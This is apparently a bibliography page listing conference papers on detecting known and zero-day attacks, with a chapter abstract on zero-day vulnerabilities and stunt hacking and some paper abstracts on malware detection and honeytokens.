This chapter focuses on the obsession with technical security vulnerabilities at the beginning of the twenty-first century. A vulnerability that is not common knowledge and for which no patch has yet been released is referred to as a zero-day vulnerability. The term zero-day refers to the fact that there have been zero days' advance warning, meaning no days, regarding the risk that the security vulnerability represents. Security technologies such as intrusion detection systems and antivirus software normally try to detect known patterns of attack and so typically would be unlikely to detect the use of a zero-day vulnerability. The chapter then looks at stunt hacking, which was portrayed as a way to draw attention to dangerous vulnerabilities. What went unsaid was that stunt hacking was a means by which hackers and commercial security companies could promote themselves and their technical skill sets.

Conference papers on the topic "Known and Zero-Day Attacks Detection"

1

Wang, Shen, Zhengzhang Chen, Xiao Yu, Ding Li, Jingchao Ni, Lu-An Tang, Jiaping Gui, Zhichun Li, Haifeng Chen, and Philip S. Yu. "Heterogeneous Graph Matching Networks for Unknown Malware Detection." In Twenty-Eighth International Joint Conference on Artificial Intelligence (IJCAI-19). California: International Joint Conferences on Artificial Intelligence Organization, 2019. http://dx.doi.org/10.24963/ijcai.2019/522.

Abstract:
Information systems have widely been the target of malware attacks. Traditional signature-based malicious program detection algorithms can only detect known malware and are prone to evasion techniques such as binary obfuscation, while behavior-based approaches rely highly on the malware training samples and incur prohibitively high training cost. To address the limitations of existing techniques, we propose MatchGNet, a heterogeneous Graph Matching Network model to learn the graph representation and similarity metric simultaneously based on the invariant graph modeling of the program's execution behaviors. We conduct a systematic evaluation of our model and show that it is accurate in detecting malicious program behavior and can help detect malware attacks with fewer false positives. MatchGNet outperforms the state-of-the-art algorithms in malware detection by generating 50% fewer false positives while keeping zero false negatives.
2

Sejr, Jonas Herskind, Arthur Zimek, and Peter Schneider-Kamp. "Explainable Detection of Zero Day Web Attacks." In 2020 3rd International Conference on Data Intelligence and Security (ICDIS). IEEE, 2020. http://dx.doi.org/10.1109/icdis50059.2020.00016.

3

Reardon, Shay, Murtadha D. Hssayeni, and Imadeldin Mahgoub. "Detection of Zero-Day Attacks on IoT." In 2024 International Conference on Smart Applications, Communications and Networking (SmartNets). IEEE, 2024. http://dx.doi.org/10.1109/smartnets61466.2024.10577735.

4

AlEroud, Ahmed, and George Karabatis. "A Contextual Anomaly Detection Approach to Discover Zero-Day Attacks." In 2012 International Conference on Cyber Security (CyberSecurity). IEEE, 2012. http://dx.doi.org/10.1109/cybersecurity.2012.12.

5

Gao, Xueqin, Kai Chen, Yufei Zhao, Peng Zhang, Longxi Han, and Daojuan Zhang. "A Zero-Shot Learning-Based Detection Model Against Zero-Day Attacks in IoT." In 2024 9th International Conference on Electronic Technology and Information Science (ICETIS). IEEE, 2024. http://dx.doi.org/10.1109/icetis61828.2024.10593684.

6

Sandescu, Cristian, Razvan Rughinis, and Octavian Grigorescu. "HUNT: USING HONEYTOKENS TO UNDERSTAND AND INFLUENCE THE EXECUTION OF AN ATTACK." In eLSE 2017. Carol I National Defence University Publishing House, 2017. http://dx.doi.org/10.12753/2066-026x-17-075.

Abstract:
Worldwide data infrastructure has increased in dimension and complexity due to consolidation, centralization and virtualization trends during the last 10 years. Being able to discriminate quickly between large-scale non-directional attacks and targeted APTs (advanced persistent threats), or between script kiddies and experienced hackers, is key for protecting critical IT infrastructures. While the first case can be easily handled by existing solutions, the latter raises significant challenges. Implementing honeytokens and honeypots is an extremely efficient intrusion detection system based on setting traps for hackers by deliberately placing enticing resources within existing environments. Previous research has used honeypots to understand hacking TTPs (tactics, techniques and procedures) and to generate more realistic honeytokens. In this paper we build on existing results to quickly categorize attacks, map the attacker persona and focus on targeted attacks. We influence the execution flow by trapping the attackers in a maze with three purposes. The first aim consists in distracting them from the real data and understanding their motivation; this is done by placing low-hanging fruits in their path. The second aim refers to getting to know the attackers, gathering forensic evidence and using this information to adapt incident response. The last goal is the most difficult: to completely remove the threat by revealing the attackers' identity, getting in contact, handing them over to law enforcement agencies, or deterring them. We deploy a series of interconnected honeytokens, working together as a whole. Each honeytoken will have an exploitation difficulty in order to map out the attacker's skills and will lead to the next honeytoken, thus forming a real-world hacking scenario. We are also analysing the possibility of deploying dynamic traps based on how the attack develops in real time.
From a technical perspective we propose a zero-touch approach for existing environments, by deploying the honeytokens as a service in the cloud, with minimum overhead for the customer.
7

Radhakrishnan, Kiran, Rajeev R. Menon, and Hiran V. Nath. "A survey of zero-day malware attacks and its detection methodology." In TENCON 2019 - 2019 IEEE Region 10 Conference (TENCON). IEEE, 2019. http://dx.doi.org/10.1109/tencon.2019.8929620.

8

Regi, Suraj, Ginni Arora, Raga Gangadharan, Ruchika Bathla, and Nitin Pandey. "Case Study on Detection and Prevention Methods in Zero Day Attacks." In 2022 10th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO). IEEE, 2022. http://dx.doi.org/10.1109/icrito56286.2022.9964873.

9

Marbukh, Vladimir. "Towards Security Metrics Combining Risks of Known and Zero-day Attacks: Work in Progress." In NOMS 2023-2023 IEEE/IFIP Network Operations and Management Symposium. IEEE, 2023. http://dx.doi.org/10.1109/noms56928.2023.10154439.

10

Holm, Hannes. "Signature Based Intrusion Detection for Zero-Day Attacks: (Not) A Closed Chapter?" In 2014 47th Hawaii International Conference on System Sciences (HICSS). IEEE, 2014. http://dx.doi.org/10.1109/hicss.2014.600.
